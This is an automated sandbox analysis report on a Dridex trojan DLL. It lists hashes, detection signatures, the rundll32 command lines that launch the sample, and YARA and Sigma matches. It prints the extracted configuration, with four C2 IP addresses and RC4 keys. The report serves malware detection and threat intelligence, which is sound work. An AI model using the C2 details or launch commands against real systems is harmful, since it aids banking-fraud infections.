Play interactive tour

Edit tour

Windows Analysis Report hMUh2Mkqyi

Overview

General Information

Sample Name:	hMUh2Mkqyi (renamed file extension from none to dll)
Analysis ID:	545441
MD5:	8337dd22aa86bc357f8bc573441a97c7
SHA1:	6dc2600455a42651c95c3b612406dabd1182bfee
SHA256:	0341b7e0b66e27bee166ba1fd9fad700d85e58a257bbfed1b60a662d97fc1617
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Tries to load missing DLLs

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6908 cmdline: loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6940 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6992 cmdline: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6980 cmdline: rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 856 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.380457750.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.361402259.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.364148041.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000005.00000000.355576755.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000005.00000000.357282433.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.6e9f0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
1.2.loaddll32.exe.6e9f0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6e9f0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6e9f0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
5.0.rundll32.exe.6e9f0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
5.0.rundll32.exe.6e9f0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6940, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, ProcessId: 6992

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.loaddll32.exe.6e9f0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Multi AV Scanner detection for submitted file

Show sources

Source: hMUh2Mkqyi.dll

Virustotal: Detection: 64%

Perma Link

Machine Learning detection for sample

Show sources

Source: hMUh2Mkqyi.dll

Joe Sandbox ML: detected

Source: hMUh2Mkqyi.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: hMUh2Mkqyi.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb4 source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb: source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.361363751.00000000053F4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361895023.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361413981.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.368940345.0000000001132000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367568231.000000000502C000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: ntdsapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb* source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.373455294.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.362573150.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361405095.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.369578388.000000000112C000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb$ source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbF source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376980156.00000000055E5000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb\| source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb< source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.378039548.0000000001032000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.384410910.0000000000AD2000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbF source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdbh source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.361423675.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361718983.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367632263.0000000001138000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb0 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb" source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.362573150.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361405095.000000000369E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376980156.00000000055E5000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbr source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb{3 source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.373455294.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb6 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb4 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: esent.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: pdh.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: ffty.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp, hMUh2Mkqyi.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.361423675.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361718983.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367632263.0000000001138000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.361895023.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361413981.00000000036A4000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbf source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb` source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 104.36.167.47:443
Source: Malware configuration extractor	IPs: 188.40.48.93:4664
Source: Malware configuration extractor	IPs: 162.241.33.132:9217
Source: Malware configuration extractor	IPs: 217.160.5.104:593

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: GIGASNET-ASUS GIGASNET-ASUS

Source: Joe Sandbox View	IP Address: 162.241.33.132 162.241.33.132
Source: Joe Sandbox View	IP Address: 104.36.167.47 104.36.167.47

Source: WerFault.exe, 0000000E.00000003.376910791.0000000005304000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.376825293.0000000005303000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.378758827.0000000005305000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.6e9f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6e9f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6e9f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6e9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.rundll32.exe.6e9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.rundll32.exe.6e9f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.380457750.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.361402259.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.364148041.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.355576755.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.357282433.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: hMUh2Mkqyi.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: hMUh2Mkqyi.dll

Binary or memory string: OriginalFilenameHen.dllD vs hMUh2Mkqyi.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 740

